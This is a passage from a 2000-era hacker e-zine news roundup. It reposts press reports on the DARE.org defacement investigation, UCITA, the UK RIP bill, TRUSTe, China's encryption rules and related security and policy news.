sent, threats have been levied, ISPs have crumbled,
people have been fired from their jobs and worse. The
fight is not over.
2600 <see elsewhere this issue>
http://www.2600.com/news/2000/0312.html
Open DVD
http://www.opendvd.org/
@HWA
19.0 HNN:Mar 14th:Tracking Down Coolio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Carlos
Log file analysis and a search engine, those where the
most complicated tools needed to track down Coolio
(Dennis Moran). Coolio was charged last week with
defacing the Dare.org web site. (And this is what the
FBI wants all that extra money for?)
Associated Press - via ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html
On the Trail of a Hacker
Court Papers Reveal How Cyber Gumshoe Tracked Teen Dennis Moran, 17,
who goes by the name "Coolio" on the Internet, talks with reporters
March 8, near his Wolfeboro, N.H., home after being questioned by
the FBI about crippling attacks on major Web sites in February.
(Ken Williams/Concord Monitor/AP Photo)
http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg
The Associated Press
W O L F E B O R O, N.H., March 13 Recently
released court records explain how authorities
traced the hacking attack on a popular anti-drug
Web site to a Wolfeboro teenager.
Dennis Moran, 17, was charged last week with hacking
into the Web site of DARE.org and defacing it with
pro-drug abuse slogans and images.
He has acknowledged he vandalized the Los
Angeles-based site and two others, but said he was only
joking when he claimed responsibility for the attacks that
crippled Yahoo, eBay and other major sites last month.
Court records released Friday show police began
investigating Moran after noticing his Internet nickname,
Coolio, on the defaced DARE.org site in November.
At the bottom of the Web site were the messages
Coolio is k-r4d and so are drugs and Craftily owned
by Coolio :D.
Searching in Cyberspace
Los Angeles Police Detective Michael Brausman used a
search engine to find a Web page that included an e-mail
address for Cooliok-r4d.com. He traced the address to
another site that included a directory labeled Coolio.
Inside the directory was one of the images posted on the
DARE site.
By late December, the detective had contacted the
owner of an Arizona-based server who confirmed he had
e-mail messages related to the Coolio directory. A search
of the server�s logs showed someone using the e-mail
address cooliok-r4d.com had sent messages that included
Moran�s name, address and phone number.
In one message, Moran inquired about registering
cool.io as an Internet domain name.
If there�s any way I could buy the domain for this,
please email me pricing and information. Thanks, Dennis
Moran, he wrote.
Brausman called Wolfeboro police Dec. 30.
Investigators interviewed Moran on Feb. 17.
Moran faces two state charges of unauthorized access
to a computer system. Each felony is punishable by up to
15 years in prison and a $4,000 fine.
Although Moran also was questioned by the FBI
about several denial of service attacks on major
commercial sites, including Yahoo.com and eBbay.com,
no charges have been filed in those cases.
Investigators said they were seeking someone using the
Internet signer Coolio in those attacks, but also said the
name is used by many people online.
@HWA
20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The US Department of Justice has officially launched a
cybercrime web site defining computer crime and
describing how to report it. The site also includes
department's latest thinking on privacy vs. policing on
the Internet as well as computer search and seizure
guidelines.
Associated Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html
(Sorry dead link ... -Ed :( )
Cybercrime.gov
http://www.cybercrime.gov/
@HWA
21.0 HNN:Mar 14th: China Relaxes Crypto Rules
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acoplayse
After pressure from the US-China Business Council
Chinese authorities have agreed to "clarify" encryption
regulations that where published in October last year.
the State Encryption Management Commission (SEMC),
which reports to the Ministry of State Security, has said
that only hardware or software for which encryption is a
core function will be limited by the regulations. products
that contain encryption as a secondary function will no
longer be restricted. This includes browsers, consumer
electronics and other items.
Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C&
live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading=
information%20technology&_ref=526610871
China softens rules on encryption
By James Kynge - 13 Mar 2000 22:06GMT
China has backed away from sweeping restrictions on the use and sale of foreign
encryption technology that would have wreaked havoc on the use of foreign
software, mobile phones, e-mail and other communications applications.
The US-China Business Council, which led a lobbying effort that united several
national chambers of commerce in Beijing, said on Monday that Chinese
authorities had agreed to "clarify" encryption regulations published in October last
year.
The main sense of the clarification was that only hardware or software for which
encryption is a core function will be limited by the regulations of the State
Encryption Management Commission (SEMC), a body that reports to China's
intelligence agency, the Ministry of State Security.
This means that mobile phone handsets, windows software, browser software
and other applications that contain encryption as an ancillary function will not now
be restricted.
Windows 2000, Microsoft Corp's newest operating system, which is set to be
launched in China on March 20, was given approval for sale this month by
authorities, prefiguring the relaxation in SEMC's rules.
It was not immediately clear what types of products would fall under the definition
of having encryption as a core function. Under the SEMC's original restrictions, all
businesses and individuals would have had to register with the government any
products containing encryption technology.
They then would have had to apply for permission to use the goods.
But a clarification letter issued by the SEMC allayed fears the government would
gain access to corporate secrets carried in encoded communications by requiring
companies to hand over their encryption source codes.
Business travellers carrying laptops with ordinary software, even if it contains
some encryption capabilities, are not required to register, the US-China Business
Council quoted the SEMC as saying in a verbal clarification of the regulations.
@HWA
22.0 HNN:Mar 14th:Stallman on UCITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Uniform Computer Information Transaction Act will
threaten the existence of free software if passed.
Richard Stallman the founder of the Free Software
Foundation has spoken out vehemently about this
legislation and continues to do so.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html
Interview: GNU guru Richard Stallman
The president of the Free Software Foundation and founder of the
free-software movement speaks out against UCITA.
By Robert Lemos, ZDNet News March 12, 2000 3:44 PM PT
When Richard Stallman founded the GNU (or Gnu's Not
Unix) Project in 1984, his aim was to create
Unix-compatible tools that were free. Sixteen years
later, GNU software is a critical part of most Unix
systems and forms the basis -- along with Linus
Torvalds' Linux kernel -- of all Linux systems.
With the proposed Uniform Computer Information Transaction Act
(UCITA) threatening the free-software movement, ZDNet News Senior Editor
Robert Lemos caught up with Stallman, president of the Free Software
Foundation, in India.
ZDNet: What will be the effect of UCITA on the free software
movement?
Stallman: UCITA would make it harder for us to avoid liability for
bugs that turn up in the free software we develop -- while giving
proprietary software developers a very easy way to avoid all liability for
their products, even for faults that they know about in advance. This is
grossly unfair.
UCITA would also give proprietary software developers a way to
prohibit reverse engineering. They could then promulgate secret formats
for distributing and storing data and stop us from implementing free
software to handle those formats. We would be unable to provide you with
software to access your own data.
ZDNet: What will be the effect on GNU development? What about
GNU/Linux?
Stallman: I don't expect UCITA to have any immediate effect on our
software development. But in the long term we will probably have trouble
making our software handle the secret data formats and support new
hardware whose specifications are secret.
Microsoft already said they plan to use secret formats and protocols
to block the development of (GNU/) Linux. The format of Word is already a
secret, and it is only through reverse engineering that people can figure
out anything about it.
ZDNet: Will software be worse because of UCITA?
Stallman: That is the wrong question. The right question is how will
users of software be worse off because of UCITA?
I've already explained the problems free software will face. We will
face additional obstacles to doing a good job. For non-free software,
developers will not face additional obstacles, but they will be able to
restrict the users in onerous ways. So even if the software is unchanged,
the users will be worse off.
For example, the owners will be able to change the software license
at any time, restricting what you are allowed to do with a program. They
will be able to send you e-mail containing new conditions, and these new
conditions will be legally binding on you even if you never actually got
the mail.
If you do see the mail and you reject the new conditions, they will
be able to demand that you stop using the program -- and even send your
machine a message across the network to turn off the program without a
moment's notice.
ZDNet: If there is so much opposition, why has the BSA, and others,
had so much success in pushing the bill through?
Stallman: As far as I know, they have succeeded in one state. The
term "so much success" seems to be an exaggeration.
I don't know why they succeeded in Virginia; I can only guess. But
here are some things, which are not unusual, which may have happened this
time:
1.The supporters of UCITA probably are better organized and
have more money to contribute to election campaigns.
2.The legislators probably have not actually read UCITA, and
that enabled supporters of UCITA to mislead them about both what UCITA
would do and why people oppose it.
3.The supporters of UCITA probably told the legislators ...
that if Virginia passes UCITA and other states do not, some software
companies will move to Virginia.
State legislators and governors often give an unreasonable amount of
emphasis to winning business to their states from other states. They often
do this without regard to whether the country as a whole will benefit or
suffer as a result. Business often uses this to manipulate states, to play
one state against another, to get what it wants.
The joke, though, is on them, because only retail Internet sites
would move to Virginia, and the total employment of these sites would be
insignificant. The software
development will remain where it is, in California,
Washington, Bangalore or wherever.
(Sorry about formatting, couldn't be bothered to pretty it up ... - Ed)
@HWA
23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The industry trade group TRUSTe was formed in an
effort at self regulation and to help fend off unwanted
legislation. Are they really doing the public a service? An
interview with TRUSTe CEO Bob Lewin details how even
sites selling personal data can acquire the privacy seal
of approval.
Salon
http://www.salon.com/tech/view/2000/03/13/truste/index.html
The privacy police?
TRUSTe CEO Bob Lewin explains how even sites selling
personal data can get the nonprofit's privacy seal of approval.
- - - - - - - - - - - -
By Lydia Lee
March 13, 2000 | When TRUSTe launched in
1996, the nonprofit promised to help the Internet
industry regulate itself with regard to protecting
surfers' privacy. Over the past three years, it has
vetted the privacy policies of over 1,300 sites, and its
black-and-green logo, which signals to visitors that a site actually
abides by its policies, can be found on most major e-commerce
sites. But what kind of teeth does the organization really have?
TRUSTe didn't look so trusty last year when a security expert
found that its licensee RealNetworks had been collecting user
information on the sly. Instead of reprimanding the company, the
nonprofit argued that because RealNetworks' privacy violations
took place via its RealJukebox software, not its Web site, the
incident was outside the purview of TRUSTe. More recently, it's
been other privacy advocacy groups like JunkBusters that have
alerted the public to privacy violations such as Intel's decision to
include an identifier in its Pentium III chip; JunkBusters also
started a campaign against DoubleClick's acquistion of Abacus
when it was announced last June.
But Bob Lewin, executive director and CEO of TRUSTe, says
the group's privacy seal program plays an important role in
enforcing privacy policies. Previously, Lewin was vice president
of marketing at networking software company ISOCOR and
before that at the open systems consortium X/Open Company.
Now he heads up this nonprofit that charges between $300 and
$4,999 to certify an e-commcerce site's privacy practices.
What's the basic message you're giving to consumers when
they see the TRUSTe symbol? Is it that the site isn't going
to sell my data?
The bottom line is that this site adheres to the fair information
practices -- that they are disclosing what information they're
collecting, why and if they're sharing that information with
somebody. No 2: that they're giving the visitor the choice --
whether to allow that to happen; 3) that once the information is
collected, they will use reasonable security to protect that
information; 4) that they allow the consumer reasonable access to
that information to modify it.
So if I were collecting consumers' e-mail addresses and
then selling them to a direct-marketing company, would I
still be able to get the TRUSTe symbol?
Only if you stated that to the consumer in your privacy statement.
If somebody came to us and said, "Here's our privacy statement.
We will collect the e-mail addresses, and it's our intent to sell or
share this information with these third parties, and we are giving
you the option to say yes or no to this." Then that site could
become a TRUSTe licensee.
What percentage of sites get rejected?
It's not a large percentage -- I'd guess 1 to 2 percent.
What's the major reason sites get rejected?
Once they start through the process, they can't or will not meet
the requirements of the program. Say they'd like to be able to
share info with a subsidiary, and we say, "That's to a third party,
you have to disclose that." Well, they may voluntarily decide
they're not going to proceed. Also, we don't apply our mark to
gambling sites, since it's illegal in some states. The other reason
that it happens, frankly, is that 85 percent of our sites are very
small -- $10 million and below --- and as the process starts, the
company goes out of business.
If DoubleClick had been a TRUSTe member, would its
decision to combine its database of anonymous surfing
habits with an acquired database of personal information
have set off red flags for you?
There would be some issues. That's why we formed a third-party
ad server committee, to get all the technical and legal issues out
on the table.
They would have had to inform us before they changed their
policy, and we would have had some discussions.
Once it has the TRUSTe seal, have you ever kicked out a
site for doing something?
No, we've come very close, but we haven't had to do it. The
escalation process is as follows: We get a complaint from a
consumer about a licensee, and once we are assured that the
consumer had previously contacted the Web site to try and get it
resolved -- because a lot of these are just misunderstandings --
we then contact the Web site and investigate and find out indeed
if there's a real issue here. Now, the resolution to this may result
in a change in the privacy policy, the business model, or what
have you.
Shouldn't you have caught that kind of stuff when you
reviewed the policy in the first place?
Well yes, but the nature of the beast is that all of this is software.
What is generally the case is that there's been some unplanned
feature in the software. Something will happen -- not that
somebody wanted to do it, but the software allowed them to do
it. So, when it happens, you point it out, it gets fixed and it's over.
But that shouldn't mean they need to change their privacy
policy, should it?
It could be just a software change, but it could be a policy
change. Let's say you implement software that shares information,
or decide to collect more info than you originally stated --
perhaps you're collecting IP addresses, or disseminating cookies.
So you have to change your policy. This whole thing is not a static
field. We do constant monitoring, but many of our licensees will
communicate with us, and in fact one-third of our efforts is
focused on working with them. As their Web sites evolve, we've
got to ensure that the privacy statement evolves. It's an ongoing
process.
Would it be incumbent on the company to notify all the
users who had seen the previous privacy policy?
If they start collecting new information, then at that point in time,
they have to communicate to users from this point forward, "We
are also doing this." So that has to be stated clearly in the privacy
statement. It would not impact people from beforehand because
that information was not being collected.
But what if the people from beforehand come back and then
they don't read the privacy policy? Is there anything in the
TRUSTe program that says if you are instituting a new
privacy policy, you have to let all the consumers from
before know that?
Well, we can't force consumers to read privacy statements, but in
all our consumer outreach programs, we tell people: Even if
you've visited this site before -- because things change -- the first
thing to do is go to the privacy statement and review it to make
sure there have been no changes. And we encourage licensees to
put any changes up at the front. This is easier said than done --
none of us like to read pages and pages of text.
Have you ever blown the whistle on a company?
Yes, there are instances -- most of the problems are not with
malice aforethought. The major monitoring is by consumers
themselves, but we have people who look at the sites every
quarter, to see if there've been any changes on the site. We also
enter in names that we make up, opt-in in some cases and
opt-out in others, so if we get communication to a name then we
know where it came from.
What role should the government have in enforcing online
privacy?
They play a very important role now, because they conduct
studies on whether improvement has occurred within the industry
-- the number of privacy statements, the quality of privacy
statements. I think the government has clearly stated that certainly
in the health-care and financial area, they feel the need to have
some kind of legislation. They also did that for children --the
Children's Online Privacy Protection Act. They've said that
because this is super-sensitive information, you should have some
guidelines.
Now, the question becomes, what vehicle do you use to enforce
that legislation, which is equally important. We feel that seal
programs -- and in particular, TRUSTe -- play a very important
part there. COPPA is going into law April 21, and our contract
will contain the elements for Web sites to adhere to COPPA
requirements.
But it seems like a lot for any one company to keep up
with. With all these violations going on, it seems like there
needs to be a more watchful eye.
I would say that there is a watchful eye, if people look at the facts
versus hype from some advocacy groups. It's all very well to run
around screaming and yelling, "The sky is falling, the sky is
falling," but the fact is, many of these issues that have come up are
evolutions that occur in business models on the site. I would argue
that the industry has demonstrated very quick response when
those problems come up.
Take RealNetworks. The issue there occurred outside the scope
of the current TRUSTe program. Yes, Real Networks is a
TRUSTe licensee, but this particular issue had nothing to do with
the collection of personal information on the Web site; it had to
do with the collection of user information using software servers.
Now, within a week, even though it was outside the program, we
announced the formation of a pilot to evolve our program to
handle those situations. I defy any government agency to do that.
But customers aren't thinking, when they see the TRUSTe
symbol, that it only covers the Web site. Maybe from the
technical view it's different, but the consumer isn't going to
make the distinction. Does the TRUSTe program cover
both now?
Yes, we need to do a better job so the consumer intuitively
knows what the TRUSTe logo stands for. Ultimately, it would be
great -- as we lay out the software privacy program -- to blend
the two programs together. Or there may be a TRUSTe symbol
for sites and one for software.
What privacy issues are you trying to anticipate?
One thing we're looking at is the wireless world, where we start
talking about palm-held things and hand-held things and phones. I
think there are some issues there we haven't fully addressed yet.
We need to add more meat to the term "reasonable security."
Today, that's the best term people have, because it can vary so
much depending on the application and the technology. As we put
more and more of these things into people's hands, we have to
worry about how we prove that the person holding it is indeed the
proper owner.
salon.com | March 13, 2000
- - - - - - - - - - - -
About the writer
Lydia Lee is an associate editor for Salon
Technology.
@HWA
24.0 HNN:Mar 15th:UCITA Sign By Governor in Virginia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by techs
Set to take effect in July 2001 the Uniform Computer
Information Transaction Act has been signed into law in
Virginia by Governor James S. Gilmore III. UCITA will
allow software companies to remotely disable software
and will giving licensing agreements the force of law.
Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html
Computer World
http://www.computerworld.com/home/print.nsf/all/000314F772
Post;
Gilmore Signs 1st Internet Commercial Code Into Law
By Craig Timberg
Washington Post Staff Writer
Tuesday, March 14, 2000; 1:00 PM
Virginia Gov. James S. Gilmore III signed the nation's first set of
contractual rules specifically governing electronic commerce into law
today on the second day of an Internet summit at George Mason University.
The Uniform Computer Information Transaction Act, which is typically
called by its initials "UCITA," overwhelmingly passed the General
Assembly during the just-finished legislative session despite the
opposition of critics who contended it would erode basic consumer
rights. Because of that continuing debate, the law will not take
effect until July 2001 while lawmakers study the fine print.
Supporters such as Gilmore (R) say UCITA mainly updates for the
Information Age the commercial codes that states passed decades ago.
UCITA essentially gives the force of law to software licensing
agreements as soon as a consumer rips the shrink-wrap off the box or
hits the "I Accept" button on a program downloaded from the Internet.
"UCITA provides clarity to contract law where none existed before,
whichwill make it easier for consumers and industries to conduct
transactions viathe Internet," Gilmore said in a statement. "This
increase in electronic transactions will perpetuate the Internet
revolution, promote e-commerce and foster the growth of Virginia's
technology and manufacturing economies."
State officials hope that by becoming the first state to adopt
UCITA, Virginia will further its reputation as a center of
high-technology and attract more businesses to the state.
But consumer advocates warn that in the rush to adopt UCITA,
Virginia overlooked concerns that have caused two dozen attorneys
general around the country, including Maryland's J. Joseph Curran Jr.
(D) to write a letter voicing concerns.
Consumer groups warn that UCITA will give software companies new
power to disable or "reposses" their products if they believe they
are being used in a way that violates the licensing agreement.
Another worry, say consumer advocates, is that buyers won't always
know the details of the licensing agreements until after the purchase
is made.
"The whole idea of informed shopping is based on disclosure before
purchase," said Jean Ann Fox of the Virginia Citizens Consumer
Council, which lobbied against the bill.
The signing took place at The 2000 Global Internet Summit at
George Mason's campus in Fairfax.
(c) 2000 The Washington Post Company
-=-
Computer World;
Va. governor signs UCITA legislation into law
By Patrick Thibodeau
03/14/2000 Fairfax, Va. � Flanked by the chairman of one
of the state's largest businesses � America Online
Inc.'s Steve Case � Virginia Gov. James Gilmore today
signed the Uniform Computer Information Transactions
Act (UCITA) into law.
But the bill won't take effect until July 2001, giving
people and businesses with concerns about UCITA time
to seek legislative amendments, the governor said.
"We're not deaf to people's concerns," said Gilmore.
Still, Gilmore said he doesn't believe those concerns
were "legitimate impediments" to the state's adoption
of the legislation.
The year-delay for adoption came at the behest of a
coalition of some of the state's largest nontechnology
companies, who believe UCITA gives software vendors
the upper hand in software licensing (see story).
"If there's any sense that things may not be quite right,
there is plenty of time for people to come in under
Virginia's approach and have a chance to do some
amendments," said Gilmore. The state plans to create a
study committee to examine the issues raised by the
business coalition that sought to delay the law's
implementation.
UCITA sets a series of default rules governing
commercial software transactions. One of its most
controversial provisions would allow a software vendor
to automatically disable software in a contract dispute.
Case praised Virginia's action and said he hoped "other
states will look at this and learn from this and embrace
it."
Virginia is moving quickly on UCITA to help create an
attractive climate for its technology businesses. For
UCITA to become the law of the land, technically it
must be adopted by 50 states. But companies may
nonetheless cite UCITA in their license agreements. "If
Virginia remains the only state that adopts this, then I
believe that the certainty of our (actions) would attract
additional businesses into the commonwealth," said
Gilmore.
Maryland is also actively considering the legislation.
@HWA
25.0 HNN:Mar 15th:RIP Goes Before Commons Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lady Sharrow
The UK Government's Regulatory Investigatory Powers
(RIP) Bill goes before Select Committee in the House of
Commons today and in a little more than six months it
could be enshrined in law. The bill will force ISPs to
have the facilities to log and monitor all online activities
of their users.
The Register UK
http://www.theregister.co.uk/000314-000016.html
Posted 14/03/2000 11:37am by Sean Fleming
What the hell is... the UK's RIP Bill
The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select
Committee in the House of Commons today and in a little more than six months it
could be enshrined in law. But with 30 amendments tabled against it and an angry
mob of opponents waiting to string it up, RIP has become better known for the
widespread - and some might say kneejerk - reaction people have had to it, rather
than for its aims and content.
Civil liberties groups, individual Net users and politicians from all the major UK parties
are banding together to decry what is being labelled a Snoopers Charter. But just
what is all the fuss about? The Blair administration has been slammed by many for its
cronyism and control freakery, so is this just another example of Big Brother Blair
wanting to watch over you at all times?
Growing pains
To become an accepted part of everyday life, and not just the place to go for
cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a
broader cross-section of the general public. Ecommerce, for example, will never thrive
in a world where the majority of potential users and customers are too scared to part
with their credit card details in case they get ripped off. The not-so-wired public need
to feel confident about the Internet. This is all part of the natural evolution that all things
go through when they achieve popularity. The days of the WWW Wild West are
numbered.
So, what does the Bill propose and why are so many people objecting to it. The Bill
describes itself as: "A Bill to make provision for and about the interception of
communications, the acquisition and disclosure of data relating to communications,
the carrying out of surveillance, the use of covert human intelligence sources and
the acquisition of the means by which electronic data protected by encryption or
passwords may be decrypted or accessed; to provide for the establishment of a
tribunal with jurisdiction in relation to those matters, to entries on and interferences
with property or with wireless telegraphy and to the carrying out of their functions by
the Security Service, the Secret Intelligence Service and the Government
Communications Headquarters; and for connected purposes."
Lots of spooky terms in there - "covert human intelligence sources" translates as
spies - but in essence this is all about setting down a legal framework within which
electronic communications are treated no differently from telephone tapping and
intercepting mail (as in the paper stuff). Some people will throw their hands in the air
at the very thought of any this but cracking down on the illegal use of the Internet by
terrorists, perverts and organised criminals may be considered by many to be A Good
Thing.
One size fits all
However, the Bill falls down - and in a big way - in the details. Or lack of them. It is
vague on practicalities, and how permission to access private communication will be
granted. ISPs will be obliged by law to have the facilities to log and monitor all the
online activities of their users. But the Bill doesn't specify how this will be done.
And while there is talk of the Government reimbursing hardware costs with regard to
monitoring, it doesn't make provision for the massive increase in overheads this will
bring.
The Bill is also very vague in parts and can be interpreted in such a way that much of it
becomes nonsensical. For example, it defines who will be covered by the Bill when it
becomes law: "a person who provides a postal service, or b) a person who provides
a public telecommunications service, or c) a person not falling within paragraph b)
who has control of the whole or any part of a telecommunications system located
wholly or partly in the UK."
ISPs, mobile phone companies, WAP service providers, news servers and so on all
fall under the term "telecommunications service". Look at that definition again - it
could mean anyone.
One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to
say on this point: "You're no longer using an ISP to connect to the Net. You're using the
ISP's public telecommunication system."
The Bill also makes it an offence for you to be told that a surveillance warrant has ever
been issued against you. That offence exists in perpetuity - there is no expiry date, you
can never be told. And should anyone ever tell you they risk a prison sentence.
Someone to watch over me
Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just
go round snooping on people willy nilly. Well, guess again. Here's what the Bill says
about surveillance warrants. There are four main justifications given by the bill for
issuing a warrant:
a) national security interests,
b) to prevent or detect serious crime,
c) to safeguard the UK's economic well being
d) for the purpose, in circumstances appearing to the Secretary of State to be
equivalent to those in which he would issue a warrant by virtue of paragraph (b), of
giving effect to the provisions of any international mutual assistance agreement.
And there's a list as long as your arm of those people who can issue the warrant
against you - from senior police officers to "any such other personas the Secretary of
State may by order designate".
Reading between the lines, the Bill says that the Home Secretary can - for any reason
- issue a warrant against anyone, and that anyone with the Home Secretary's
permission can do likewise. Don't forget, you'll never know if information has been
gathered about you, what it was used for and so on.
Taking Liberties
As it stands, reader Simon Batistoni writes , The RIP Bill contains one truly frightening
basic assumption: if you have stored on your computer any form of encrypted
message, you will be forced on request by the police to hand over the necessary keys
t decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU
HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a
two-year jail term.
The principle of the police being able to view encrypted data, so that they can nail
paedophiles, drug dealers, etc, has some genuine merits.
The flaw in this measure, however, is that the recipient/possessor of encrypted data is
guilty, until proven innocent, something which destroys the entire foundation of our
legal system. What's more, it is impossible to prove that you never had something.
As it stands, the measures in the Bill could be applied to a PGP-encrypted signature
on an email, currently used by many as a reliable means of identity verification.
Theoretically, the innocent father of a suspect under
surveillance, who receives an email from his son containing the standard encrypted
signature, could fall under the scope of this RIP Bill; he could be jailed for failing to
reveal the contents of the encrypted data.
Ostriches need not apply
Small wonder that there is so much opposition to the Bill. There are many more
examples of the above thinking running throughout the Bill, such as the loophole that
could mean you have to keep tabs on yourself but can never let yourself know,
otherwise you end up in prison. Stand has done a much more comprehensive job of
examining RIP than The Register is able to do and its site is well worth a visit.
Don't be fooled into thinking that your Government will always have your best interests
at heart, because that's not the way of Governments. But at the same time, don't
assume that any attempt to regulate the Internet is an invasion of rights and freedoms -
freedom without responsibility is, after all, little more than latent tyranny. We will all be
affected by the RIP Bill when it becomes law - as it almost certainly will, in some form
or another - so now is the time to find out a little more about it and decide where you
stand, because in another six months it could all be too late. �
@HWA
26.0 HNN:Mar 15th:Security Patch Locks Out Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
A a 128-bit security patch for Internet Explorer 5.0,
5.0a, and 5.0b released by Microsoft will replace
security files with older versions that will lock users out
of their systems after restart. Microsoft has asked
administrators to stop distributing the patch and has
said that a fix will be available soon.
InfoWorld
http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml
IE5/Windows 2000 security patch can lock out users
By Cynthia Morgan, Computerworld
MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a
security patch for Internet Explorer 5.0 that could prevent Windows 2000
users from logging in to their computers.
Instructions included with the patch, a 128-bit security add-on for
Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a
Microsoft spokesman. The error, a command-line "switch," causes an
automated installation to replace security files with older versions that
will lock users out of their systems after restart. The 128-bit security
installations under Windows 9x and Windows NT 4.x are not affected, the
spokesman added.
Administrators who have built automated installation packages for Internet
Explorer 5.0 on Windows 2000 systems should check the Microsoft site for
information on correcting the problem. Meanwhile, installation packages
containing the faulty switch should be frozen immediately.
A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions
and updates should be available at search.support.microsoft.com/kb within
24 hours, the spokesman said.
Microsoft Corp., in Redmond, Wash., is at www.microsoft.com
For more enterprise computing news, go to www.computerworld.com. Copyright
(C) 2000 Computerworld, Inc. All rights reserved.
@HWA
27.0 HNN:Mar 15th:DNA Used for Steganography
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dan
17-year-old Romanian-born Viviana Risca topped the
59th Intel Science Talent Search competition by
embedding a computer message in the gene sequence
of a strand of DNA using steganography, a data
encryption technology that allows a computer user to
hide a file within another file.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm
What you're doing right now? Don't worry, it's totally normal.
Posted at 7:51 a.m. PST Tuesday, March 14, 2000
New York teen-ager win $100,000 with encryption research WASHINGTON (AP) -- A
17-year-old Romanian-born girl who embedded a computer message in the gene
sequence of a strand of DNA has been named the best young scientist in the
country.
Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington,
N.Y., won a $100,000 college scholarship when she bested 10 other high school
seniors on Monday in the 59th Intel Science Talent Search competition.
Risca said her project in steganography, a data encryption technology that
allows a computer user to hide a file within another file, was a simple one.
Risca, who emigrated from Romania eight years ago, embedded the secret message
``June 6 Invasion: Normandy.''
Technologies like steganography can protect sensitive electronic information
from interception or eavesdropping, but they can also wreak havoc if used by
terrorists and criminals.
Formerly known as the Westinghouse Science Talent Search, the contest has been
nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates,
nine MacArthur Foundation fellows and two Fields medalists.
Forty finalists came here to compete for the award.
Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize
and a $75,000 scholarship for a math project on partition function. And Feng
Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third
prize and a $50,000 scholarship for a biochemistry project in molecular
virology.
The other winners in the top 10, their schools, the amounts of their
scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High
School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18,
Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that
investigated G proteins; Matthew Reece, duPont Manual Magnet High School,
Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann
Geiler, 17, Massapequa (N.Y.) High School,$20,000 for a project on communication
by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills
Estates, Calif., $20,000, perception of light and shape by the brain; Zachary
Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a
study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif.,
$20,000, the transition of ammonia and hydrogen halide into ammonium halide.
The other 30 finalists received $5,000 scholarships.
@HWA
28.0 HNN:Mar 15th:Bugging SAT Phones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Odin
A lot of people have turned to satellite phones as a last
ditch effort to retain some privacy. Now Motorola has
patented a means by which to listen in to a satellite
phone to satellite phone call.
New Scientist
http://www.newscientist.com/news/news_222923.html
(sorry: 404! - Ed)
@HWA
29.0 HNN:Mar 15th:More and more EZines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by L33t Dawg
New issues of several e-zines have been released
including, Hack In The Box Issue #3, HWA Haxor news
#51 and Datacore has released DataZine 0.02.
Hack In The Box Issue #3
http://www.hackinthebox.org
HWA.hax0r.news
You're here already :-)
DataZine .02
http://www.tdcore.com/index2.html
@HWA
30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Army has placed all of its worldwide cyber defense teams on full
alert after learning of a threat from a group known as The Boys From
Brazil. The group has threatened to deface the army.mil home page.
The Army has said that it is aware of the group's or attack profile,
and is prepared for any attack against the Army's Web site and that
they have enacted additional 'countermeasures' to protect the site.
(Is there really a threat? Who knows, but this sounds like one hell
of a publicity stunt.)
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp
Army on hacker alert
BY Dan Verton
Updated 03/16/2000 at 17:05 EST
